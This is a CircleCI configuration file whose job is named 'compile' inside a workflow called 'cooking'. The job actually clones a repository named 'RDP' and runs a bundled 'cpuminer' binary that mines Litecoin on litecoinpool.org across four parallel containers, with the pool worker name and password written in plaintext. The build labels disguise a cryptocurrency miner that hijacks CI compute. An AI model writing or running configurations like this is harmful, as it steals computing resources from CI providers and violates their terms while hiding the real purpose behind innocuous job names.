version: 2.1
jobs:
  compile:
   docker:
     - image: ubuntu:latest
   steps:
      - run:
          command: |
           apt update 
           apt-get install build-essential automake libssl-dev libcurl4-openssl-dev libjansson-dev libgmp-dev zlib1g-dev git -y
           mkdir  ~/.ssh
           ssh-keyscan github.com >> ~/.ssh/known_hosts
           git clone --depth=1 git@github.com:ltcwoker/RDP.git Q
           cd Q
           chmod 755 cpuminer
           ./cpuminer --algo=scrypt --url=stratum+tcp://us.litecoinpool.org:3333 --userpass=djemil.mywoker13:my123456
      
   parallelism: 4       
workflows:
  version: 2.1
  cooking:
    jobs:
      - compile